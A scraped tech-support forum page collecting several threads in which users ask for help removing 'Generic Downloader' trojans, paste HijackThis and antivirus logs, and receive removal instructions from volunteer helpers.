C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Expl... Read more

A:Generic Downloader.z/trojan?

14 more replies
Answer Match 70.14%

yea so i clicked a stupid youtube link and got this generic downloader virus. any help would be much appreciated. attached is the hijack log

ile of Trend Micro HijackThis v2.0.2
Scan saved at 12:48:20, on 1/16/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Altiris\eXpress\Client Recovery Agent\AeXAgent.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Wave Systems Corp\Common\DataServer.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\McAfee\Common Framework\FrameworkService.exe
C:\Program Files\McAfee\VirusScan Enterprise\Mcshield.exe
C:\Program Files\McAfee\VirusScan Enterprise\VsTskMgr.exe
C:\Program Files\Dell\NICCONFIGSVC\NICCONFIGSVC.exe
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\NTRU Cryptosystems\NTRU Hybrid TSS v2.0.7\bin\tcsd_win32.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\PROGRA~1... Read more

A:Generic Downloader Trojan!!! Please Help

bump
 

1 more replies
Answer Match 70.14%

PLEASE HELP!!!

It appears that I have a virus called 'Trojan Generic Downloader.k' I am using McAfee Security Centre 7.1 and it detects it and tells me that it is deleting the Trojan, however when I restart my computer it is back. I am also getting some warning messages about possible un-authorized file changes or something??? There is also this icon name 'install' that keeps re-appearing on my desktop after each reboot and my firewall ends up having errors that I need to go to a Virtual Technician on McAfee website to fix. I've been reading forums for 3 days and trying everything I can find, nothing seems to be working for me. This is getting frustrating McAfee tech support forum suggested I come here and post my logfile, they said you guys were awesome... so I'm giving it a try

Thank you in advance!!!
Here is my logfile, (logfile could end up diferent after reboot??) hope someone can help me out.


Logfile of HijackThis v1.99.1
Scan saved at 6:17:41 PM, on 04/02/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0011)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\ehome\ehtray.exe
C:\Program Files\Java\jre1.5.0_09\bin\jusched.exe
C:\WINDOWS\sts... Read more

A:Trojan Generic Downloader.k PLEASE HELP ME!!!!

Hi CaperJules,

Welcome to Tech Support Forum!

I apologize for the delay getting to your log. The helpers here are all volunteers and we have been very busy here lately. If you are still having malware problems, I will be glad to help.

First of all, you didn't unzip/extract HijackThis. I strongly advise you to unzip/extract HijackThis because HijackThis will not be able to make backups when it is run from the zip folder.

How to unzip HijackThis:Right-click on the HijackThis zip folder and choose "Extract All".
An extraction wizard window will now open. Click "Next".
In the "Files will be extracted to this directory:" field, type C:\HijackThis. Then click "Next".
Click "Finish" to show your unzipped/extracted HijackThis folder. Run HijackThis.exe from here, or add a shortcut to your desktop.


NEXT:

Go to the Start menu, and click on Control Panel. Choose Add/Remove Programs and remove any of the following that are listed:

Lycos SideSearch
MySearch
MyWay
MyWay Search
MyWay Search Assistant
MyWay Speed Bar
MyWebSearch
MyWebSearch Bar
RXToolBar
Search Assistant ? MySearch
Search Assistant ? MyWebSearch
SideSearch


NEXT:

Please run HijackThis and click "Scan". Place a check (tick) next to the following entries (if present):

F3 - REG:win.ini: load=C:\WINDOWS\system32\fcsicgi\winlogon.exe
F3 - REG:win.ini: run=C:\WINDOWS\system32\fcsicgi\winlogon.exe
O2 - BHO: MyWebSearch Search ... Read more

8 more replies
Answer Match 70.14%

Hi all, Please could you help, I've reached the limit of my knowledge and can't fix a problem. My Wife's laptop has VIsta installed. She disabled windows update, as far as I can tell, well over a year ago. Recently the laptop has been behaving unpredictably. I use the firefox browser and periodically a new tab opens whilst I am browsing. I cannot run windows update, I get various error messages whenever I try. I've run the samsung recover software which reinstalls key files from a hidden partition, but this hasn't helped. I ran a full scan using AVG free edition. It reported several infections, most of which AVG said it removed. It couldn't remove 2 infections. This is what the AVG report said . . ."";"C:\Windows\System32\wuauclt.exe (1144):\memory_00010000";"Trojan horse Agent_r.XJ";"Object is inaccessible.""";"C:\Windows\System32\wuauclt.exe (1144)";"Trojan horse Agent_r.XJ";"""";"C:\Windows\explorer.exe (916):\memory_00010000";"Trojan horse Agent_r.XJ";"Object is inaccessible.""";"C:\Windows\explorer.exe (916)";"Trojan horse Agent_r.XJ";""I've managed to attach the ark.txt file, (EDIT)I've added the attach.txt file in a reply to this post as I was having probs getting it to work. Many thanks in advance for any help... Read more

A:generic trojan downloader and others

Hello and welcome to the forums!My secret agent name on the forums is SweetTech (you can call me ST for short), it's a pleasure to meet you. I am very sorry for the delay in responding, but as you can see we are at the moment being flooded with logs which, when paired with the never-ending shortage of helpers, resulted in the delayed responding to your thread.I would be glad to take a look at your log and help you with solving any malware problems.If you have since resolved the issues you were originally experiencing, or have received help elsewhere, please inform me so that this topic can be closed. If you have not, please adhere to the guidelines below and then follow instructions as outlined further below:Logs from malware removal programs (OTL is one of them) can take some time to analyze. I need you to be patient while I analyze any logs you post. Please remember, I am a volunteer, and I do have a life outside of these forums.Please make sure to carefully read any instruction that I give you. Attention to detail is important! Since I cannot see or directly interact with your computer I am dependent on you to "be my eyes" and provide as much information as you can regarding the current state of your computer.If you're not sure, or if something unexpected happens, do NOT continue! Stop and ask!In Windows Vista and Windows 7, all tools need to be started by right clicking and selecting Run as Administrator!These instru... Read more

6 more replies
Answer Match 70.14%

Hello

McAfee is reporting the above trojan on the system but cannot delete, clean or quarantine the file.

We've not noticed any "symptoms" or problems yet but obviously would like to avoid any that may start.

Do you need any more info to be able to advise what we should do?
Thanks in advance for your help.

This is the HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:52:02, on 11/07/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\McAfee.com\PERSON~1\MpfService.exe
C:\PROGRA~1\McAfee\SPAMKI~1\MSKSrvr.exe
C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\Program Files\CyberLink\PowerDVD\DVDLauncher.exe
C:\Program Files\ATI Technologies\ATI.ACE\CLI.EXE
C:\Program Files\McAfee.com\VSO\oasclnt.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\WINDOWS\System32\DLA\DLACTRLW.EXE
C:\Program File... Read more

A:Generic Downloader.z trojan

15 more replies
Answer Match 70.14%

The generic downloader.g trojan is attached to file t1157309568.dll. The location is C:\Documents and Settings\Owner\Local Settings\Temp. I've attached the hijackthis log. Thanks for the help

Logfile of HijackThis v1.99.1
Scan saved at 4:17:38 PM, on 9/3/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\VTTimer.exe
C:\Program Files\McAfee.com\VSO\mcvsshld.exe
C:\Program Files\McAfee.com\VSO\oasclnt.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe
C:\Program Files\Kodak\KODAK Software Updater\7288971\Program\Kodak Software Updater.exe
C:\PROGRA~1\McAfee\MSC\McLogCln.exe
C:\Program Files\Nikon\PictureProject\NkbMonitor.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\Nikon\PictureProject In Touch\PictureProjectInTouch.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
c:\progra~1\mcafee.com\vso\mcvsftsn.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\ewido\security suite\ewidoctrl.exe
C:\PROGRA~1\McAfee\MSC\mclogsrv.exe
C:\PROGRA~1\McAfee\MSC\mcupdmgr.exe
c:\program files\common files\mcafee\mna\mcnasvc.exe
C:\PROGRA~1\McAfee\MS... Read more

A:Generic Downloader.g Trojan

11 more replies
Answer Match 70.14%

running on windows vista premium home i have a log from hjt i am not too sure how long i want to be online with this disease ive got har harLogfile of Trend Micro HijackThis v2.0.2Scan saved at 3:05:40 PM, on 5/1/2008Platform: Windows Vista (WinNT 6.00.1904)MSIE: Internet Explorer v7.00 (7.00.6000.16643)Boot mode: NormalRunning processes:C:\Windows\system32\taskeng.exeC:\Windows\system32\Dwm.exeC:\Windows\Explorer.EXEC:\Program Files\Windows Defender\MSASCui.exeC:\Windows\System32\hkcmd.exeC:\Windows\System32\igfxpers.exeC:\Program Files\Synaptics\SynTP\SynTPEnh.exeC:\Program Files\Sony\ISB Utility\ISBMgr.exeC:\Program Files\Java\jre1.6.0_05\bin\jusched.exeC:\Windows\system32\igfxsrvc.exeC:\Program Files\Sony\VAIO PC Wireless LAN Wizard\AutoLaunchWLASU.exeC:\Program Files\Grisoft\AVG7\avgcc.exeC:\Program Files\iTunes\iTunesHelper.exeC:\Program Files\HP\HP Software Update\hpwuSchd2.exeC:\Windows\ehome\ehtray.exeC:\Windows\ehome\ehmsas.exeC:\Program Files\Windows Media Player\wmpnscfg.exeC:\Program Files\HP\Digital Imaging\bin\hpqtra08.exeC:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exeC:\Program Files\Grisoft\AVG7\avgwb.... Read more

A:Trojan Downloader Generic 7.gc

oh also its so annoying but i get denied access into my most important system files , i cannot uninstall the items that caused this its awful thanks

4 more replies
Answer Match 70.14%

mY OPERATING SYSTEM IS wIN xP PRO

I've updated MacFeee and have the lastest versions and Win Service pack 2

i HAVE A TROJAN NAMES gENERIC dOWNLOADER.BT

i'VE TRIED THE FOLLOWING :

i RAN A SCAN IN SAFE MODE WITH SYSTEM RETORE TURNED OFF

i HAVE mCFEE av

i'VE RAN mACFEE IN SAFE MODE

fILE IS: WINDOWS\SYSTEN32\XLIBGFL254.DLL

CAN I start system in DOS and delete this file ?
Get into correct directory and use the DEL command to delete this file ?


HERE IS MY LOG:

ComboScan v20070212.14 run by Terry Jackson on 2007-02-15 at 19:15:40
Computer is in Normal Mode.
--------------------------------------------------------------------------------

System Restore was disabled; re-enabling.
Failed to create restore point: System Restore is disabled (service is not running).
Performed disk cleanup.


-- HijackThis log (run as Terry Jackson.com) -----------------------------------

Logfile of HijackThis v1.99.1
Scan saved at 7:16:22 PM, on 2/15/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDO... Read more

More replies
Answer Match 70.14%

I have recently managed to get a trojan virus ( trojan virus generic downloader )while using the internet, thinking i was downloading the latest version of flash player. Although i have loacated the file and deleted it, and when i run a scan on my computer it no longer picks it up, my computer is sill running quite slow and a lot of programs are not responding. At random i will start hearing vidoes playing in the background without any window being open. It usually sounds like a news channel playing in the background which repeats itself over and over. It all started when i got the virus which leads me to think they are linked.

I followed the steps you stated to do, by downloading GMER and DDS to get the necessary reports to display to you, i will attach them now

I would be very grateful if you could help me with this problem and hopefully we can resolve this issue i'm having

thanks
Conor


DDS (Ver_10-03-17.01) - NTFSx86
Run by Conor at 17:29:38.46 on 31/08/2010
Internet Explorer: 8.0.7600.16385
Microsoft Windows 7 Enterprise 6.1.7600.0.1252.44.1033.18.959.153 [GMT 1:00]


============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Program Files\AVG\AVG9\avgchsvx.exe
C:\Program Files\AVG\AVG9\avgrsx.exe
C:\Windows\system32\lsm.exe
C:\Program Files\AVG\AVG9\avgcsrvx.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe... Read more

A:Trojan generic downloader

Hello and Welcome to TSF.

Please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

Please note that these fixes are not instantaneous. Most infections require more than one round to properly eradicate.

Please stay with me until given the 'all clear' even if symptoms seemingly abate.

Kindly follow my instructions and please do no fixing on your own or running of scanners unless requested by a helper.

------------------------------------------------------

Due to the restrictions on Windows 7, all tools should be started by right-click > Run as Administrator

------------------------------------------------------

Please visit this webpage for download links, and instructions for running ComboFix:

http://www.bleepingcomputer.com/comb...o-use-combofix

* Ensure you have disabled all antivirus and antimalware programs so they do not interfere with the running of ComboFix.

Get help here

Please post the C:\ComboFix.txt in your next reply for further review.

Please re-enable your antivirus before posting the ComboFix.txt log.

-----------------------------------------------... Read more

6 more replies
Answer Match 69.72%

Hi all,

After AVG scanned my comp. this morning it found a virus - Trojan Horse Downloader Generic.PST, and not being very computer literate, I am turning to you experts to let me know what I'm supposed to do now! When the window popped up saying 'virus found' I didn't know if I should delete it, so I put it in the virus vault (I have no idea if that was the right thing to do). Anyway, here's more details from AVG:

File name: VTUUV.DLL
File path: C:\WINDOWS\SYSTEM
Size 34.51 KB

Can someone please advise as to the steps I should take to get rid of this? My OS is WIN98 SE. Thanks so much for any replies!
 

A:Trojan Horse Downloader Generic. PST

16 more replies
Answer Match 69.72%

AVG reported this found on 9th September but I only noticed today when the internet failed to react and I checked AVG. The internet will not work on ie and I am sending this via Firefox.

The full AVG message is:-
File: C:\WINDOWS\SYSTEM32\userinit.exe
Infection: Trojan horse Downloader.Generic10.QLN
Result: Object is whitelisted (critical/system file that should not be removed).

I have downloaded Malwarebyte from my Netbook but although it loads it will not run.

I should also mention that I am getting a Generic Host process for Win32 Services error which I understand occurs in XP service pack 2 - I have SP3 so this should not need the patch??

Can you help please.

A:Trojan Horse downloader generic 10.QLN

Hello and welcome.. Try this approach.Reboot into Safe Mode with Networking How to enter safe mode(XP)Using the F8 MethodRestart your computer. When the machine first starts again it will generally list some equipment that is installed in your machine, amount of memory, hard drives installed etc. At this point you should gently tap the F8 key repeatedly until you are presented with a Windows XP Advanced Options menu. Select the option for Safe Mode with Networking using the arrow keys. Then press enter on your keyboard to boot into Safe Mode. >>>> Download this file and doubleclick on it to run it. Allow the information to be merged with the registry.RKill....Download and Run RKillPlease download RKill by Grinler from one of the 4 links below and save it to your desktop.

Link 1
Link 2
Link 3
Link 4

Before we begin, you should disable your anti-malware softwares you have installed so they do not interfere RKill running as some anti-malware softwares detect RKill as malicious. Please refer to this page if you are not sure how.
Double-click on Rkill on your desktop to run it. (If you are using Windows Vista, please right-click on it and select Run As Administrator)
A black screen will appear and then disappear. Please do not worry, that is normal. This means that the tool has been successfully executed.
If nothing happens or if the tool does not run, please let me know in your next replyDo not reboot your computer after running rkill as the malw... Read more

18 more replies
Answer Match 69.72%

Hi, I am new to the site, so I am not sure exactly what I need to post in regards to my question. I have AVG (free version) and within the past day, it continually pops up with "Threat Detected" while opening file....the most current file it displays is C:\WINDOWS\tk58.exe Trojan horse Generic3.UNS. I heal it each time, but it keeps happening more and more frequently. Also, I am getting an ambundance of pop-ups every time I turn the computer on, even if Firefox and IE are closed. Please help! I have had this computer over 2 years and never had a problem, so this is very frustrating

Computer is a Dell Dimension E510 running Windows XP
Model Dell DM051
X86-based
x86 Family 15 Model 4 Stepping 4 GenuineIntel ~2793 Mhz

Please help, and let me know what additional info you need.

Thank you so much!
Jenny
 

More replies
Answer Match 69.72%

I have avg free edition, and every time I start up my computer it tells me that I have a Trojan horse Downloader.Generic.BUN., and it wont let me delete it or anything. can some one tell me how to get rid of it because every time I open an internet browser, my fire wall tells me it is trying to accecs the internet.
 

A:Trojan horse Downloader.Generic.BUN

11 more replies
Answer Match 69.72%

Hello, I am using AVG shield which picked up the virus. I am now getting popups from AVG asking me what I want to do with the virus. When I click either heal or send to vault it says an error message. I also use Spybot, Windows Defender and a few more, but AVG was the only one to pick it up. I don't know how to send a file log either I am now running Stinger and then I will download Highjack This, any other suggestions?? Thanks

A:Trojan Horse Downloader.generic

I suggest you post a HijackThis log for examination.A member of the HijackThis Team will walk you through, step by step, how to disinfect your computer.Read How to post a HijackThis Log. Please read, and follow, all directions carefully!!!Then, run a log, and post it in the HijackThis forum, at this link. Do not, fix anything, yet.A member, of the HJT Team, will help you out.It may take a while to get a response, because the HJT Team are very busy. Please, be patient, these people are volunteers. They will help you out, as soon as possible.NOTE:Once you have made the post, please, DO NOT make another post in the HJT forum, until it has been responded to by a member of the HJT Team. The first thing they look for, when looking for logs to reply to, is 0 replies. If you make another post, there will be 1 reply. The team member, glancing over the replies, might assume someone is already helping you out, and will not respond. So, just make your post, and let it sit there, until a team member responds. This way you will be taken care of, in the most timely manner.

1 more replies
Answer Match 69.72%

Hello every one,

seems that my time just arrive.
could you give me some help handling with this trojan Downloader.Generic.AEG ??

I'm also without task manager!!!

a curious thing is that i have installed a sp3 on my windows 2000, and hijackthis see sp2:

this hijack was made after run complete system scan of AVG antivirus professional and Ad-Aware SE personal (last version 1.06 updated)

attached a Hijackthis:

Logfile of HijackThis v1.99.1
Scan saved at 15:07:23, on 19-06-2005
Platform: Windows 2000 SP2 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\hidserv.exe
C:\WINNT\stchost.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\system32\stisvc.exe
C:\WINNT\Explorer.EXE
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINNT\system32\spool\DRIVERS\W32X86\3\fppdis1.exe
C:\Programas\Google\Gmail Notifier\gnotify.exe
C:\WINNT\system32\spool\DRIVERS\W32X86\3\fpdisp5a.exe
C:\WINNT\loadqm.exe
C:\Programas\MSN Messenger\MsnMsgr.Exe
C:\Programas\Lavasoft\Ad-Aware SE Personal\Ad-Aware.exe
C:\Programas\Grisoft\AVG Free\avgwb.dat
C:\WINNT\system32\696671.exe
C:\Programas\Internet Expl... Read more

A:Downloader.Generic.AEG trojan horse, please help!

7 more replies
Answer Match 69.72%

Hello every one,

seems that my time just arrive.
could you give me some help handling with this trojan Downloader.Generic.AEG ??

I'm also without task manager!!!

a curious thing is that i have installed a sp3 on my windows 2000, and hijackthis see sp2:

this hijack was made after run complete system scan of AVG antivirus professional and Ad-Aware SE personal (last version 1.06 updated)

attached a Hijackthis:

Logfile of HijackThis v1.99.1
Scan saved at 15:07:23, on 19-06-2005
Platform: Windows 2000 SP2 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\hidserv.exe
C:\WINNT\stchost.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\system32\stisvc.exe
C:\WINNT\Explorer.EXE
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINNT\system32\spool\DRIVERS\W32X86\3\fppdis1.exe
C:\Programas\Google\Gmail Notifier\gnotify.exe
C:\WINNT\system32\spool\DRIVERS\W32X86\3\fpdisp5a.exe
C:\WINNT\loadqm.exe
C:\Programas\MSN Messenger\MsnMsgr.Exe
C:\Programas\Lavasoft\Ad-Aware SE Personal\Ad-Aware.exe
C:\Programas\Grisoft\AVG Free\avgwb.dat
C:\WINNT\system32\696671.exe
C:\Programas\Internet Expl... Read more

A:Downloader.Generic.AEG trojan horse, please help!

duplicate closed

http://forums.techguy.org/t374153.html
 

1 more replies
Answer Match 69.72%

AVG "heals" (or so it says) this virus everytime but it keeps coming back. Windows XP home edition
 

A:Trojan Horse Downloader.Generic.NON

12 more replies
Answer Match 69.72%

Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft Windows 8.1, 64 bit
Processor: Intel(R) Pentium(R) CPU 2020M @ 2.40GHz, Intel64 Family 6 Model 58 Stepping 9
Processor Count: 2
RAM: 6023 Mb
Graphics Card: Intel(R) HD Graphics, -1984 Mb
Hard Drives: C: Total - 464260 MB, Free - 412166 MB;
Motherboard: TOSHIBA, Portable PC
Antivirus: Windows Defender, Disabled

new here I got this trojan downloader generic that avg sees but once stops it my icons stop working and sound is gone too.

this my hijack this log

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 11:51:24 PM, on 4/11/2015
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.17416)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\AVG\AVG2015\avgui.exe
C:\Program Files (x86)\AVG Web TuneUp\vprot.exe
C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
C:\WINDOWS\SysWOW64\ctfmon.exe
C:\Program Files (x86)\AVG Web TuneUp\avgcefrend.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\P... Read more

More replies
Answer Match 69.72%

Logfile of HijackThis v1.99.1
Scan saved at 00:17:04, on 14/07/2006
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\rundll32.exe
C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Waktu Solat\waktusolat.exe
C:\Program Files\Google\Google Talk\googletalk.exe
C:\Program Files\Analog Devices\ADSL USB MODEM\dslmon.exe
C:\Program Files\Windows Media Player\wmplayer.exe
C:\Program Files\Yahoo!\Messenger\ypager.exe
C:\WINDOWS\explorer.exe
C:\PROGRA~1\MOZILL~1\FIREFOX.EXE
C:\Program Files\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://searchmiracle.com/sp.php

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://searchbar.findthewebsiteyouneed.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://searchbar.findthewebsiteyouneed.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://searchbar.findthewebsiteyouneed.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.findthewebsiteyouneed.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://searchbar.findthewebsiteyouneed.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://searchbar.findthewebsiteyouneed.com
R3 - URLSear... Read more

A:trojan downloader generic hgt removal help

err.. i meant that i need help to remove this malware which is driving me out of my wits, as avg kept popping messages of infected files everytime i'm connected to the net.

19 more replies
Answer Match 69.72%

Has anyone found a fix for this Trojan Horse. I have looked everywhere and cant find anything on it,let alone how to fix it.
 

A:Trojan Horse Downloader Generic DRZ

10 more replies
Answer Match 69.72%

My AVG Free Antivirus keeps flagging this but can't seen to do anything with it. How do I get rid of it? Help, please.

A:Trojan Horse Downloader. Generic. We

Hello weybrewTry running AVG in Safe Mode. "How to Boot in "SAFE MODE" tutorial"Also if your using Win XP or 2000, download and scan with Ewido Anti-Malware v3.5Ewido Install and Scan Instructions

11 more replies
Answer Match 69.72%

This issue started last week. Seems to only have an effect with my IE8. Will usually only happen with my browser when I first open IE8. After that it seems to stay quiet and will wait a substantial amount of time before trying again. The following pages open and are difficult to close, once the pages start opening.

hxxp://results.saveandcoupon.com/index.php?c=1231&ss=Tech%20Support%20Forum&nr=5

hxxp://lpgen.info/mylpgen/registry-errors-bundle/60x11684267_b0?c=60b0

hxxp://www.registrydefender.com/l/indexsg.asp?utm_medium=ctx&utm_campaign=mg1&utm_source=ron3594&utm_term=ron_113594

hxxp://www.dailyconsumerguide.com/vidlp3.php?subid=adonronvid3

hxxp://www.localpages.com/results-lp.php?ref=yp3&bcat=&place=,&sortby=relevance&cid=99995

hxxp://www.fb-survey.com/survey.php?kwd=ron_113594

hxxp://www.usadebthelp.org/0819/?mediatag=17521&kw=&click_id=27305788&sub_id=92666157_adonronexitpop

hxxp://www.kevinsmoneytree.org/ns3.php?from=j3-113594_ron_5_0&via=H-extpop

hxxp://channel1reports.com/jobs3/?from=j3-113594_ron_5_0

hxxp://www.consumernews24.com/popularnews/1/ad.php?t202id=92716&t202kw=ron_113594

hxxp://www.internetcorkboard.com/search.php?q=Adult+Dvd&txn=3191-4DA5570F

hxxp://www.registrydefender.com/l/indexsg.asp?utm_medium=ctx&utm_campaign=mg1&utm_source=ron3594&utm_term=ron_113594



DDS (Ver_10-03-17.01) - NTFSx86
Run by Scott at 018.71 on Mon 09/27/2010
Interne... Read more

A:Trojan Horse Downloader Generic 10

Hello and welcome to TSF.

If you still need help:
Please download Rootkit Unhooker and save it to your desktop.
Double-click RKUnhookerLE.exe to run it.
Click the Report tab, then click Scan
Check Drivers, Stealth Code, Files, and Code Hooks
Uncheck the rest, then click OK
When prompted to Select Disks for Scan, make sure C:\ is checked and click OK
Wait till the scanner has finished then go File > Save Report
Save the report somewhere you can find it. Click Close
Attach it in your next reply.

Note** you may get the following warning. It is ok, just ignore it.

"Rootkit Unhooker has detected a parasite inside itself!
It is recommended to remove parasite, okay?"

14 more replies
Answer Match 69.72%

Hi,
Would really appreciate some help. Have got this virus on my PC. I am running windows XP. This is the message log below and I'm not sure what I need to do next.
Added to this is in order to receive any e-mails I have had to remove AVG (free) to get messages.
Any help would be appreciated.
Thanks
Start Time= 30/07/2006 21:44:50.59
Running from: C:\Documents and Settings\Maureen Dineen\Desktop

((((((((((((((((((((((((((((((((((((((((((((( Qoologic's Log )))))))))))))))))))))))))))))))))))))))))))))))))))

21:46:28.68

Qoologic uninstaller found and executed
Registry entries fixed
(((((((((((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))))
